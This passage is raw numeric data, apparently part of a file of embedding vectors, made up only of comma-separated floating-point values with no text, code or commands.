3386,0.0070484043,-0.02664139,-0.007638705,-0.00414676,-0.01023184,-0.003474416,0.006135357,0.018281128,0.0092643695,-0.0028997154,-0.004795227,-0.0040978272,0.03710987,0.00008764002,0.014290088,0.013263408,-0.0014180639,0.020022735,0.00008647402,-0.020191588,0.014497208,0.009616956,0.003161998,-0.0016775106,-0.004478731,-0.0070889182,0.011935173,-0.011475875,0.0059420047,-0.035485942,-0.0215477,0.038905486,-0.030972894,-0.0016115399,-0.024497598,-0.004103722,0.012587889,0.009186142,0.013115904,0.020415884,-0.007183759,0.009932391,0.031372473,-0.0070877573,0.004421144,0.010286071,0.003855074,0.0010753904,-0.0027139925,-0.011954651,-0.016414037,-0.0025098491,0.011245228,0.0062442976,0.0018955352,-0.0067964406,0.0009823291,-0.013585292,-0.00046692858,0.027777862,0.007847363,-0.022783568,0.007030111,0.02142208,0.018085465,-0.015358507,0.024095448,0.00423463,0.0052265804,-0.021705076,0.019323625,-0.018961227,0.0071081175,0.00453495,-0.007996104,-0.0072518196,-0.003832107,0.00013713335,-0.011776967,-0.0037822416,-0.024495743,-0.036657017,-0.022409411,0.03688781,0.0047023767,0.008795072,0.002100597,-0.027142854,-0.013873923,-0.022912389,-0.0013901216,0.04436696,-0.005061573,-0.04163737,-0.0088076545,0.003971957,0.013114207,-0.0060787285,0.012992523,-0.008440613,-0.0066344985,0.009634709,-0.00033827615,0.0013669227,-0.0080273505,-0.026975349,0.0187731,0.015584615,-0.0026650743,-0.00907054,-0.008613388,0.02221507,-0.014123428,0.022992551,0.001549304,0.0063932333,-0.020990677,0.013824652,0.04143426,-0.01025653,-0.014037348,-0.011407024,0.083809406,-0.005831627,-0.023457937,-0.00011285836,-0.027832795,0.009758019,0.019697605,-0.00032507474,-0.023511542,-0.029400202,-0.0076724906,0.003573372,-0.00419217,0.013307475,-0.014454218,0.006927526,0.018823784,0.01623337,-0.013733949,0.01074253,0.020375699,-0.018635275,-0.010400415,0.030679924,0.012824858,-0.007858145,-0.004602221,-0.012827196,-0.021752007,-0.0052782875,-0.019799788,0.005872856,0.02138607,-0.014583829,0.010779241,-0.033763442,-0.021679977,0.014578159,0.008585107,-0.005799629,0.019975351,0.0038448416,0.011125231,-0.0034941386,-0.0072162556,0.0099433,0.0027480952,0.022179795,0.0074633276,-0.0058093364,0.0033587266,0.028193545,0.00053183455,-0.013313836,-0.011783436,-0.021156767,0.018308522,-0.0023914378,-0.006626288,0.013438363,0.035946712,-0.0243235,-0.014926752,0.006965609,-0.0112191085,0.016862279,-0.0049593514,0.013574211,0.0142766265,0.041139126,-0.0101774465,-0.000570797,-0.019659208,0.020444954,-0.0018902785,0.0013808691,-0.017696176,-0.00810911,-0.016703805,0.0051485547,-0.0017534331,-0.0032990295,0.0056474474,-0.008020224,-0.00405977,-0.05955636,-0.01639778,0.0017210946,-0.022186762,0.012859077,0.005370881,0.014845172,0.017602064,0.017173762,0.0178041,-0.008656697,0.00660912,0.0069833277,0.017940288,-0.009413021,0.005671902,0.021577511,-0.02521812,-0.023944236,-0.0013969478,-0.018066702,0.010096459,-0.0011906134,-0.002782416,-0.017905222,0.003406792,-0.007518619,0.015472288,-0.011256226,-0.008381152,0.04447115,-0.027277365,-0.01213844,0.013965353,-0.028251674,-0.009774057,0.011202379,0.008003342,-0.022083845,0.011337422,-0.016763056,0.0016709924,0.008578964,-0.007877889,0.0121582635,-0.011924993,0.028587587,0.009526418,-0.0009709152,0.0072827013,-0.016695533,0.010093072,0.009141425,0.008000587,0.01764531,-0.002688176,0.025619997,-0.0025965315,-0.009280442,-0.008642511,0.0042506587,0.0088160075,0.00080383,-0.014331047,0.0064938744,-0.015161837,0.00740196,-0.0048534293,0.0070798,0.014675177,0.00828584,-0.0037442844,-0.0046436572,0.0065295617,-0.00829329,-0.006272509,0.026753567,0.003594204,-0.002482158,-0.023623936,0.026002228,0.03561281,-0.013008248,0.030961059,0.0033619397,-0.001679858,-0.018212073,-0.016822001,-0.001696943,-0.02937003,0.021732273,0.005140942,0.00010961011,-0.020357506,0.011232955,0.025991447,0.013474613,-0.043608744,-0.0013820188,0.014958526,0.003201602,-0.014056819,0.01715134,-0.0037980743,0.011779893,-0.019985514,0.0009921297,0.0041686743,-0.0019187403,-0.008401632,-0.0045292997,0.016392848,-0.012373271,-0.014278988,-0.0075449524,-0.011986344,0.025908072,-0.03256506,-0.020262465,0.007508766,0.0043811323,-0.016991196,-0.002073079,-0.013847257,0.006962804,-0.028447783,0.007407932,-0.008249804,0.0028827349,-0.008176743,0.0005880268,0.018248348,0.009565244,-0.009472032,-0.022973433,-0.025217721,-0.005906942,0.0016363978,0.02443414,-0.031512048,0.015929108,-0.014203896,0.10529708,-0.019902674,-0.007100998,0.0062431763,0.041618947,0.021914007,0.0063600703,0.0076667233,-0.021706263,-0.023528809,-0.014051798,-0.029266661,0.0017405673,-0.010536055,-0.013611326,-0.0023131613,0.011006581,0.0068913694,0.007870474,-0.0056695677,0.0049861255,0.003956703,0.014902113,-0.0027323123,-0.007038314,-0.030167252,-0.005523108,-0.0014156075,-0.021163672,-0.0001645584,-0.012566603,-0.017690595,-0.019572068,-0.03226431,-0.007883925,-0.011529753,-0.0011121299,-0.0093559325,-0.023623616,0.002460272,0.007904184,0.010136633,0.0037287627,0.0008106683,-0.01577848,-0.009464683,0.0039731585,-0.019311644,-0.0026057886,0.013383759,0.0007868512,0.009214654,-0.008085489,0.0010035998,0.014664965,-0.012343817,0.0066067586,-0.016135024,-0.012647079,0.005846213,0.0116152475,-0.024618138,-0.015774187,-0.025098681,-0.006234944,0.012929369,-0.010443241,-0.017705426,0.00006353345,0.0029482362,-0.021569312,0.022977281,-0.0063944375,0.008263096,0.002324432,0.008435901,0.02393963,-0.0090838345,0.011876471,0.016099725,-0.019292472,0.0052004606,-0.011129439,-0.0042021214,-0.005385918,-0.00041308175,-0.020109931,-0.008059894,-0.010608498,0.004283103,0.01789736,0.013337981,-0.0031222499,0.020622263,-0.00768862,-0.017900541,-0.0037857455,0.0025390198,-0.010291997,-0.03129304,0.00022094736,-0.0010533988,0.009485393,-0.0043696854,-0.014378235,-0.014826116,-0.17051767,0.015159216,-0.016159138,-0.00034504174,0.0011102944,-0.015369829,0.017529372,0.053297035,0.012948154,-0.053482972,-0.0032445954,0.011263808,0.0031941913,-0.004008317,0.00011964168,0.020569459,-0.014301447,-0.030753218,-0.027321976,0.010763847,0.015104099,0.00012868851,-0.011968877,-0.00382175,-0.0066572498,0.027017163,-0.02595572,0.007970223,0.01913624,0.012763714,-0.00038071934,-0.0040061665,0.0036954035,0.007929073,-0.0120108975,0.014014227,-0.024906963,0.0034661947,0.004201026,0.009019759,-0.0040100496,0.009273765,0.020621741,0.004876344,0.017801246,0.0050883875,0.0062003,-0.00536477,0.023076806,0.023973595,0.0027623477,-0.0030825036,0.009720628,-0.00038470805,-0.005988758,-0.030086562,-0.014591802,0.025064683,0.013661036,0.01434196,0.013081474,0.019444605,0.006138089,0.013710627,-0.012277105,-0.0125212055,0.00834945,0.0009695234,-0.0075738383,-0.008384395,0.002396722,-0.002446061,-0.008007653,0.0035128766,-0.00039978628,0.0014721149,0.009927572,0.016110558,0.01618429,0.021418432,-0.012026923,0.0019806935,0.007057707,0.00924202,0.023213157,-0.0006690023,-0.0022576868,0.007067987,0.013439127,0.01697372,0.0051611746,0.011257795,-0.0128371585,-0.008293814,-0.0013571512,0.009195101,-0.00040377807,0.024398005,-0.006798115,0.003953591,0.0026451196,-0.0013100706,-0.008054915,-0.01801915,-0.14233135,-0.033424236,0.029920647,-0.022009227,-0.0105735175,-0.010180916,0.0026294105,-0.008665963,0.023494588,-0.010703923,0.00038674517,0.0046314565,0.004338521,0.012532134,0.0032781498,-0.00611184,-0.039656512,0.016220992,-0.013201097,-0.01597066,0.012721539,0.0008119713,-0.028392082,-0.011195053,0.013867779,0.0007390764,-0.0046752878,0.026531547,0.022322904,-0.022088625,0.0009255937,0.024401315,-0.019799728,0.0044950885,-0.036393136,-0.008101671,0.00664148,-0.0026652259,-0.011526032,0.013387979,0.012945794,-0.01797943,0.013101396,0.005910073,0.012117037,-0.005703363,0.016731909,0.008455514,0.008632113,-0.0042737327,0.0041946773,0.0012493873,-0.009336986,-0.0031112866,-0.000178306,-0.013388499,-0.016927222,-0.022145722,0.010873422,0.0009728984,-0.023509968,0.008659025,-0.008209067,0.017145025,0.00020565363,0.008414787,-0.0029710517,0.01635067,0.006181833,0.013224939,0.006125935,0.021388406,0.016756885,-0.0045473618,0.028786546,0.0073521785,-0.0036172664,0.01705845,-0.012115384,-0.014007221,-0.028262947,-0.022073604,-0.019043226,0.012531977,-0.010951324,-0.013310392,-0.016091682,0.012031718,-0.018414287,0.022998143,0.00917807,0.013039521,-0.027482094,-0.01599516,-0.0003307746,0.0086979335,0.017724214,0.015187567,-0.024313318,0.009626993,-0.027022904,0.002791502,-0.017349295,0.012366354,-0.01246623,0.005983482,-0.0034461622,-0.0100294165,0.018779453,-0.0086540375,0.007653822,0.026492521,-0.02882149,-0.019199764,-0.02461247,-0.014035645,-0.011165045,-0.015947776,-0.01168699,0.029990112,-0.0033686238,0.022325428,-0.007821127,-0.029130455,-0.02088585,0.0048548337,-0.02520909,0.02923466,0.012755617,0.0007908948,-0.0070040114,0.002523665,0.03821245,-0.015901096,0.005576041,0.0051177028,0.014433991,-0.032731447,0.020388681,-0.003025046,-0.0016528188,-0.014071649,0.0018294842,0.011403087,-0.030218638,-0.032138523,0.013071815,0.019341042,-0.010487819,0.014120535,0.010371143,-0.012681964,0.0075984513,0.019356605,-0.0048829135,0.005959906,0.016977776,-0.006891771,0.022312276,-0.007110159,0.0069755656,0.009282072,0.021216348,0.005820286,0.0006668039,-0.0043045185,0.0048477068,-0.0071903975,0.00007844263,-0.0107554495,0.021070726,-0.005477119,0.010007152,-0.030857967,0.016222915,0.037225228,-0.00047280575,0.048828106,0.0015626878,0.02280487,0.0071368893,0.0051880567,-0.014479597,-0.008625581,0.02735777,0.009100991,-0.009556158,0.008923773,-0.0017459474,-0.013639846,0.011895186,-0.0103202965,-0.020650983,-0.011160884,-0.004485109,0.0056074117,-0.007337363,-0.0043198937,0.0018270094,-0.024685882,-0.013534258,0.01958798,0.0028342288,-0.012735989,-0.005280839,-0.0103023825,0.006277678,0.010606937,0.008277085,0.0020070828,-0.016232995,-0.011786022,0.004624737,-0.00019833476,0.011329314,0.008584321,-0.0046680258,-0.018995775,-0.00006566425,0.012188322,-0.023728747,-0.033925593,0.0020813858,-0.017037231,0.0024046516,0.01847174,0.0028977725,0.006910657,0.010605307,-0.0077185705,0.008504315,0.014315602,-0.022655617,0.014322318,0.011071102,-0.0064600892,0.013826363,-0.0072114365,0.0010829451,0.009218096,0.0077417083,0.024579601,0.02116151,0.02123564,-0.008023539,-0.007847212,0.014983899,0.011711601,0.0016261537,0.0048332936,0.019366536,-0.009874736,-0.0008039423,0.0080149295,-0.012361847,-0.012525211,0.024557479,-0.002211426,0.0045079454,0.008756242,-0.012304703,-0.000880528,-0.005909732,0.00884317,0.016136816,-0.015185813,0.017091814,-0.029319292,-0.000854732,-0.0022285725,0.00020065653,0.00009421567,0.0003978087,-0.00034383574,0.012324904,-0.0148663595,-0.023618426,0.008892149,0.006076961,-0.00062543503,-0.0017779964,-0.024000583,-0.018983565,0.021589505,-0.00088785344,-0.005482092,-0.028948532,0.014628428,-0.02290916,-0.011496472,0.011586229,-0.0031611426,-0.01920017,-0.03699222,-0.016035425,-0.0042361384,0.03800259,-0.008232254,0.0028676603,-0.008317244,0.017602509,-0.016759822,0.012509738,-0.0023415685,-0.007313829,0.0022162292,-0.0051064044,0.0027808258,-0.012632753,-0.0117265545,0.008066761,-0.003402223,-0.022787735,0.006879972,0.012048385,-0.019601308,-0.01736237,-0.0073209372,-0.024246505,-0.014972936,-0.0075562317,-0.014032445,0.02038336,-0.0076955906,0.0017647009,0.0035458284,0.030852398,-0.006532343,-0.004556263,0.010202108,0.018550761,-0.015548328,-0.023379609,0.0056041903,0.017328758,-0.028486596,0.011441569,0.021161014,0.010193856,0.030755026,-0.0023169843,-0.00042324248,-0.0068648155,-0.029715637,0.01060848,0.002735213,-0.011394683,-0.0046570967,0.011375495,0.010760979,-0.005180166,0.0049048853,0.00014250728,0.0032166704,0.0062274733,-0.007020791,-0.02481409,-0.010451267,-0.008248876,0.007911736,-0.0042025903,-0.00059036707,-0.026639724,-0.00091864547,-0.003224883,-0.020642465,0.014933446,0.0074142064,-0.017783584,0.011192238,0.0013801934,-0.0018862829,0.00093262026,-0.017017135,-0.008996829,-0.08311381,0.00926255,0.026472846,-0.011837774,0.03444795,0.02465216,-0.01627066,-0.011111588,-0.006065642,0.007622948,-0.009304308,-0.008731332,-0.0025505696,0.0033557129,-0.0038676152,-0.006348545,-0.0010759804,0.004468094,-0.002042101,-0.0065312847,-0.010639479,0.023499584,-0.0023532584,-0.0036154613,0.0031714332,0.0048343074,-0.010273785,0.0069965594,0.0063855764,0.0040516634,-0.022510573,0.0022036931,0.004478314,-0.021021187,0.008854847,0.017921861,0.0062317722,0.008342905,-0.0021459854,-0.004336708,0.012973546,0.0073421225,-0.000031820404,-0.011307214,0.013336475,0.016948115,-0.010513799,-0.035138518,-0.020057537,-0.0027835688,0.016787298,-0.022130227,-0.0025302824,0.025373528,0.005610853,0.008684968,0.011314113,0.0054747714,0.019105624,0.006119308,-0.011074845,-0.009312098,0.023196114,-0.0075480803,0.0148953665,0.021930367,-0.0056424555,-0.0056719077,-0.028600799,0.009789345,0.0054624192,-0.033467114,-0.012933321,-0.0017489063,-0.008357097,0.031313125,-0.018444123,-0.015018868,0.017623326,0.020167865,0.01784938,0.0017642411,0.015919307,0.00033925482,0.012471176,0.010706777,-0.004614609,0.008787292,0.019852543,-0.00090678525,-0.007034115,0.0012623061,0.021980394,-0.0025668293,-0.0039325343,0.0069182683,-0.0149850305,-0.0023536435,0.019835271,0.009073,0.0033353502,0.007452294,0.015566836,0.00048801204,-0.011706912,-0.005502967,0.0046471283,0.021921046,0.0051542865,-0.001384595,-0.010313624,0.014708706,0.018163556,0.013284786,0.021431353,0.0062082754,-0.009221503,0.02173958,-0.016370155,-0.009882929,-0.011532982,-0.033985067,-0.02384513,-0.0016450093,0.00790388,-0.017010592,-0.0043282774,-0.0060090725,-0.025989078,0.010295067,0.0036614174,0.024590094,0.0048705405,0.008523312,0.006910159,-0.0031298848,-0.007498911,-0.008024951,-0.0027408262,0.009999181,0.0026730648,-0.03047731,0.019522503,0.023701558,-0.0188696,0.01735257,-0.014217899,0.005753673,-0.010408686,-0.0067455773,0.016053198,0.008266512,0.020079976,-0.007282626,-0.0025747477,-0.003924272,0.023015874,0.008722568,0.01562987,-0.0011368858,0.0086386055,0.021156821,0.019710917,-0.012246653,-0.019649113,0.00066116895,0.013930173,-0.009042664,-0.009539222,-0.03739058,-0.017791267,-0.00006117202,0.014490054,0.008071964,-0.024027469,0.012147728,0.0038364707,0.014291453,-0.0039771805,-0.0020871127,-0.0013507704,0.009844066,-0.0139455525,-0.004439851,-0.010543758,-0.006616716,-0.00659286,-0.022641262,-0.012451715,-0.0053315484,-0.017003777,-0.006471841,-0.0016559392,0.008716139,-0.00908817,-0.010171593,0.012183903,-0.000055814657,-0.008136737,0.0058556614,-0.020564068,-0.0030934238,0.0072155264,0.011954772,-0.0011570506,0.01094102,-0.009182166,0.003992839,0.003741936,-0.0048835143,-0.0010334778,0.0045216368,-0.011371649,0.12515636,0.022723328,-0.008398131,-0.017308865,0.0039950237,0.012790239,0.025823954,0.010990669,0.018978188,0.006826159,0.015541527,-0.007898943,0.00570223,0.006138148,0.0064053256,0.025452984,0.031376522,0.013981486,0.01704889,-0.0052884836,0.023349218,-0.029049255,-0.008555653,-0.03649553,-0.00783441,-0.049947515,0.009266539,0.0046218345,-0.023954537,0.017722657,0.00522499,-0.019545345,0.013221886,0.009364508,-0.013640446,-0.009093916,-0.003195045,-0.01610708,-0.005009129,0.023612902,0.02054381,-0.002295139,-0.0032400973,-0.013927308,-0.020677768,0.009568072,0.0010528679,0.0025264195,0.006647216,-0.0060504978,0.015758619,0.010159927,0.012843194,-0.012702728,0.017263213,-0.011276307,0.0011275464,0.004943008,0.013230049,-0.014300733,0.023040427,-0.012139553,0.0016875026,0.013336044,0.033230145,-0.012670407,-0.017529052,-0.013135308,-0.012245611,-0.031989668,0.016916389,-0.011549597,-0.006406564,0.022141019,-0.02076289,0.016574506,-0.009209379,-0.020808505,-0.0028761732,-0.0045512454,-0.0052716606,0.011422152,0.002443224,0.0072733285,0.022486325,0.0022090257,0.013489052,0.027290015,0.0029877976,-0.0024362698,-0.005454843,0.0011821289,0.012290846,0.00018151617,-0.0047910283,-0.0018873855,0.008367218,-0.00606275,-0.004915747,-0.010165006,-0.0089246305,0.010055132,-0.0014787107,-0.004960188,-0.020559989,0.0017546177,-0.0026276943,0.019745218,0.0033961611,0.0058096917,-0.0062320363,-0.004060489,0.02647469,0.011772289,0.0023109692,-0.01435506,-0.006662236,-0.024352526,0.015920447,-0.017730325,-0.0074524637,-0.0011718068,0.022452625,0.034288544,0.020034844,0.017441036,-0.011069698,0.009865149,-0.009882285,-0.009924678,-0.0042676865,-0.034488022,-0.026369464,0.016648551,0.010238232,0.015668903,0.0077552535,0.008576577,-0.01505292,0.023360526,0.005678304,0.009264354,-0.011799482,-0.0038979826,-0.006815275,-0.004490318,0.022584809,-0.0034191583,0.012228498,-0.009407336,-0.011817417,0.017657436,-0.0033346103,-0.016026858,-0.028408993,-0.03426255,0.028630886,-0.005491786,-0.011296468,0.0026686764,-0.011772814,0.00056166615,0.010690784,-0.05369435,0.029795164,-0.0020296134,0.014712203,-0.0078041055,-0.018404434,-0.0044955835,-0.006822926,0.004351421,-0.008902928,0.008543896,-0.024534889,-0.0029507554,0.0058357855,0.002110821,-0.005147457,-0.0009350902,0.0038622373,0.014143033,0.0027757462,-0.00957264,0.016448244,0.0032495763,0.011016239,0.0055977274,-0.0022121733,0.029061291,0.0053547234,0.01067457,0.0016067413,0.01040804,-0.012177773,0.009590095,-0.02959271,0.04585203,-0.014553268,-0.054742545,0.0004118771,-0.0007779375,-0.016570687,0.0040626493,0.009269657,-0.0010988424,0.012347108,0.0021084966,-0.01301101,0.0046272245,0.008813585,0.017125467,0.003994493,0.000006902418,-0.0053976956,0.007145603,-0.030965399,0.013471093,-0.037312258,-0.0009638958,0.004414642,0.004874936,-0.012868709,-0.010977188,0.014145223,-0.004433824,0.015703997,0.017832452,0.011968648,-0.022443548,0.0048577897,0.017960262,0.010901534,-0.0050694975,-0.023517137,-0.0028994386,0.019707024,0.0153687475,0.0030642732,0.0027965617,-0.0049696425,-0.012213596,0.007573908,0.009984287,-0.020760247,0.0076950532,-0.0053634625,0.0030342292,-0.010872843,-0.023020415,-0.026976604,0.009921779,-0.0024453762,-0.000723092,-0.01830186,-0.0071885255,-0.0036668836,0.0051371404,0.014667005,-0.008775465,-0.0023093813,0.0027705005,0.02075722,0.002766411,-0.0075405273,-0.020979159,0.021817634,-0.00059340365,0.007859831,-0.016936168,-0.017655542,0.019728212,-0.022801448,-0.011202114,-0.009227374,0.0036474376,-0.005260207,-0.016440991,-0.020514702,0.012372399,0.02269223,-0.034236714,0.016382787,-0.010956021,0.020188997,-0.004108072,0.0054134713,0.012385372,0.040594548,-0.063802786,0.0056757703,0.014338601,-0.01769769,-0.0057565584,0.004264038,-0.02182725,-0.07736399,-0.021584991,0.021465162,0.0004103446,-0.007610528,-0.0018511672,-0.008919159,-0.020052526,-0.0220848,-0.024608137,-0.033038966,-0.003590679,-0.004336453,0.01683929,0.0064644744,0.0030886568,0.014405016,-0.026814194,-0.005543783,-0.014127692,0.0074160392,0.012831832,0.024451738,0.003577042,0.01606515,-0.015634075,0.008570324,0.0012984205,0.003918853,-0.02093517,0.016747087,-0.018633733,-0.021975094,-0.040512025,0.009755369,-0.0058876337,0.018754376,-0.013653442,-0.012033992,-0.00046597247,0.016645417,0.1481578,-0.02056164,0.0006556621,-0.022263288,-0.003992074,-0.0068831923,-0.016369356,0.0022715018,-0.0106054805,-0.00794662,-0.008824945,-0.007975231,0.009373945,-0.008573897,-0.0039055008,-0.012446664,0.0037745356,0.14084871,-0.011644312,0.014112175,0.0074551194,-0.0017699599,0.022897905,0.013818898,-0.005759763,-0.07886587,-0.00616828,-0.04237468,0.0029766657,0.014883079,-0.007815781,0.02490509,0.014930259,0.016733501,-0.0061716796,0.027437743,-0.013050211,-0.010179968,-0.027537627,-0.00076740235,-0.006647142,-0.014221172,-0.0065215724,0.022049582,-0.0041599963,-0.0034964406,-0.013473658,0.013796828,0.0123582175,0.042100128,0.0035501611,-0.0072058723,0.015239551,-0.014298905,0.006589832,0.030837214,-0.0014743946,0.0087639075,-0.015723845,0.011117298,0.024425605,0.015616462,-0.007281381,-0.0014534562,-0.00035673208,0.0040452327,-0.0064475425,-0.024526032,-0.010778647,0.016296504,0.0015974785,0.005810855,-0.004443066,0.012858537,0.010707782,-0.003065586,-0.018798692,-0.02138079,0.008958232,-0.019300714,0.022311704,0.022287773,-0.010912987,-0.004358357,0.013748927,0.0038988614,0.0073663164,0.009995311,-0.0038927451,-0.0031821255,-0.012027136,0.00033958277,0.00503798,0.009249436,-0.013390513,0.0002021003,0.0061573023,-0.0049451985,-0.013862712,-0.0016149636,-0.011807768,0.009398406,0.012653035,0.0165987,-0.013083316,0.013477543,-0.013227417,0.0069881286,0.007365097,-0.002887655,-0.00053042086,-0.014044547,-0.00068768015,0.020234138,-0.0019580754,-0.014031739,0.015839128,0.015415168,-0.02527823,0.00467456,-0.00818113,-0.018738735,0.016327336,0.015956197,-0.01978126,-0.004060284,0.0065487893,0.011334037,-0.019525135,-0.0306217,-0.014535111,-0.0040990673,0.011874074,0.027557345,0.017215976,-0.007640771,0.019816423,-0.020240776,-0.0002517532,-0.0076903976,-0.015094141,0.021903403,0.005817448,0.028525257,-0.01581137,0.0039254236,0.0065741464,-0.019815966],[0.0037974278,-0.010597734,-0.009761574,0.0050146272,-0.013140097,0.011700016,-0.0031848196,0.019741721,-0.0091680065,-0.0007592428,0.0081520425,0.015013817,-0.012187583,0.01350624,-0.0044129738,-0.0013813828,-0.009035501,0.009184404,0.011539417,-0.011838796,-0.012241571,-0.008390298,-0.004612376,0.014136801,0.010368045,0.020042429,0.0042542415,-0.019118924,0.013125292,-0.013407736,0.00046502813,0.019513255,0.0028128824,0.021143556,0.0031599978,-0.008032419,-0.014684811,0.011560333,0.008562652,-0.021020405,0.0140952505,0.013865727,0.0029508453,-0.014223397,-0.014316562,-0.0239853,-0.015841749,-0.034746632,0.0033527473,0.028739756,-0.014561497,-0.006395413,-0.011780005,0.0075892545,-0.006019059,0.006539203,-0.014601001,-0.021948365,0.029033933,-0.024272103,0.011934504,0.011194107,0.014645348,-0.017243791,0.0012346549,-0.013544286,-0.009549194,0.0019124663,0.015530646,0.0003679713,-0.00917279,0.010217717,0.0000102099675,-0.019734692,-0.010665524,0.006086027,-0.004366045,-0.009912282,0.00063848984,0.0014032889,-0.014689808,-0.0030661079,0.010333731,0.008360294,0.011995091,-0.021932486,0.01851564,0.029212248,-0.013011395,-0.0037098636,-0.014695993,0.010877932,-0.0144318035,-0.009491735,-0.026060581,0.0025431127,0.006221996,0.025102753,-0.011973242,-0.0063285003,0.01780707,-0.020472687,-0.014413669,0.004294592,0.00020790583,-0.0033055819,-0.008831966,0.0051336,-0.0073471284,0.009067359,-0.014842993,0.0055411365,0.026882928,-0.014875665,-0.006393732,-0.017911566,-0.0077158622,0.0012742132,-0.01944159,-0.0013911246,0.02294313,-0.009772298,-0.00888344,0.0040015997,-0.020131292,-0.0023742057,-0.014438196,-0.019016756,-0.013606987,-0.010377947,0.0072155516,0.001247548,-0.011493289,0.010780824,0.015232069,-0.013124685,-0.0017027671,0.020605056,0.012826027,-0.02667581,0.040701926,0.0046412204,0.0049470603,-0.017943576,0.0016316941,-0.0051211407,0.020415002,0.00191013,0.02247163,-0.000021788695,0.01953361,-0.01901336,0.005198265,-0.0042271675,0.01658759,0.009141876,-0.007843576,-0.002119244,0.011642865,0.025592338,0.0025745705,-0.007022052,-0.0025977688,0.043252125,-0.0023950995,0.01118614,0.00088517636,0.002178932,0.0088858055,0.004877641,0.0046175555,0.015378269,0.0145118795,-0.004308023,0.010354106,-0.026736325,0.031007264,-0.02680427,-0.010147367,-0.0046242625,-0.011626932,0.01077326,0.012514066,-0.0058147293,0.006928777,0.027985118,-0.0011761287,0.0004020256,-0.010114483,0.015452953,-0.02314995,-0.009387845,-0.0025751495,0.011954037,0.00020849508,-0.004901236,0.0060138935,0.072980456,0.012303646,-0.015603625,0.009324211,-0.01626689,0.006563845,-0.02170807,-0.010593788,0.0085610375,-0.028527144,0.0010585721,0.004600353,-0.009416425,0.018412497,-0.016530469,0.0063884375,0.0237214,-0.0017736306,-0.10331639,0.0078007895,0.010541723,0.0061675827,0.02352166,0.0017046967,0.0015525423,-0.0073598325,0.0011016307,0.006539445,-0.0014287799,0.028347919,0.0029137293,-0.003051374,-0.015793122,0.009950388,0.012890666,-0.012624908,0.014140194,0.018390696,-0.010665176,-0.011065036,0.011391977,-0.014505167,-0.014701846,-0.029492225,0.002563256,0.0034074895,-0.015159348,0.0027217404,0.00675341,0.010200009,0.010926764,-0.017120952,0.0026989193,-0.032909367,0.018828068,-0.0036797274,0.03760125,0.0019260892,-0.011369527,0.006675737,0.017145488,0.01168499,-0.017304424,-0.029627549,0.007821375,-0.00710021,0.0020320509,0.008731795,-0.0031843516,0.001903733,-0.029304834,0.0067275683,-0.005014022,-0.016741721,-0.013334968,0.027868118,-0.015239328,0.029565828,0.014585115,0.018083164,-0.001168822,0.0058518457,-0.009015371,-0.0066152657,-0.0042212103,-0.016105607,-0.009151288,-0.012545171,-0.006780276,0.019131545,-0.0016950131,0.0041560284,0.0055588367,-0.014768494,-0.00076029956,0.036504425,0.013565127,0.0076311864,-0.000996441,-0.023907002,-0.009041019,0.012077044,0.007333655,-0.0074409954,-0.018360136,0.00079927815,-0.007963618,0.004689425,-0.0046658483,-0.035136316,0.0029066736,0.0069714226,-0.026190337,-0.0011535389,-0.025991179,0.026597008,-0.0060099256,0.017977905,0.034572136,0.025326405,-0.012367915,0.013316373,-0.0010216837,0.004157258,-0.005708416,0.0050673583,0.014419614,-0.0013480274,-0.005773573,0.01694378,0.004973745,-0.0060243583,0.004616896,0.020978278,-0.005099422,0.00987288,0.016026374,-0.016673159,-0.000103266175,0.0012689052,0.010997236,0.0024307542,0.045037422,-0.0022881466,-0.003803035,-0.0069449763,-0.011192919,0.0003016155,0.01608185,-0.010407723,0.0031635356,0.005167868,0.0093954345,0.016621076,-0.0012575856,-0.0123889055,-0.021036051,0.0021414356,-0.014454833,-0.0037782837,-0.01042065,-0.004435088,0.010670087,0.019114744,-0.024471119,0.016401393,-0.0162256,0.051986527,0.019926667,0.0022037327,0.03490332,0.030449599,-0.011236681,0.02057835,-0.005321977,-0.008262819,-0.024927812,-0.01643703,-0.008536106,-0.01340596,0.09048692,0.004059339,0.00615703,-0.017872373,-0.0064170533,0.002925554,0.00051042304,0.044824008,-0.006134049,-0.02520239,0.016473277,0.023228295,0.016706834,-0.00083861477,-0.018330842,0.016657654,-0.006843544,-0.0073597045,-0.0029945918,-0.016028443,-0.008122021,0.0030890377,0.014257745,-0.01546425,0.004890337,-0.008143442,0.0029134352,-0.004102154,-0.00044364028,-0.010076687,-0.020205438,-0.004737756,0.024903914,0.007236664,-0.0198311,-0.0075869006,0.014872954,-0.0067452756,-0.005522438,-0.017894745,0.012038107,-0.0034343454,0.003657244,0.018144745,-0.018422244,0.003390922,0.0007020615,0.021641614,0.011555444,-0.020825975,-0.009726583,-0.005584464,0.025653861,-0.01711552,0.0046541947,-0.0109214205,0.0073070778,-0.012679155,0.01360895,0.016188202,0.0010472897,-0.018745365,0.004783981,-0.00030110907,-0.02435769,-0.007633113,0.06324715,0.0018211888,-0.0046049086,0.011352681,0.012755108,-0.013082124,-0.0060741026,0.010291476,-0.005310633,0.016354911,0.0027776046,0.02919976,0.025032086,0.014008565,-0.016600156,0.010502263,-0.04731191,0.023844438,-0.026258094,0.016268311,0.0028086628,0.0022243287,0.005370796,0.0063491645,-0.013944659,-0.0068078865,-0.0055790055,0.016354246,-0.014833646,-0.0007739279,-0.0038631682,-0.008755937,-0.0063073696,-0.011686561,-0.0024862625,0.013069458,-0.008420781,-0.008241026,0.0025809843,-0.0016894604,0.012532071,0.037515137,0.026278313,-0.012498167,-0.03351313,-0.040582843,0.02033298,-0.002334703,-0.020401862,-0.012230314,0.024437202,0.009124384,0.0074233124,0.016232248,-0.04222299,-0.009187791,0.033671062,-0.0030043325,-0.017902967,0.0016782072,0.015649568,0.007868389,-0.007000471,0.010984849,0.009310381,0.004031552,0.0025349662,0.000031136547,-0.016973563,-0.0018187794,-0.025205104,-0.00009160625,-0.019739604,-0.007334954,-0.009896586,0.012682218,0.010364723,0.009838052,-0.0034260477,0.019860283,0.0076695625,0.01704772,-0.027010297,0.022186957,0.0020756018,0.006496131,-0.020570876,0.0141101405,0.047250163,-0.0056341616,-0.007958283,0.0035678865,0.0011897457,-0.0077911583,-0.005825709,0.0026236367,0.016378783,-0.0049298154,-0.012547638,-0.0149074495,0.014714931,0.008064713,-0.01296743,-0.002024047,0.014241503,-0.017873809,0.00092701666,-0.0077557177,-0.0026025977,-0.0006854746,-0.0002782628,-0.0018682169,-0.034401454,-0.008449033,0.04304245,0.015366705,-0.006489191,0.002608425,0.009854143,-0.0063017257,0.019237362,-0.0014003001,0.014914562,-0.0002946509,0.009871518,0.0063764285,-0.0023228517,0.026754627,0.007954343,-0.012698852,-0.0009182246,0.00028758385,0.0017785493,-0.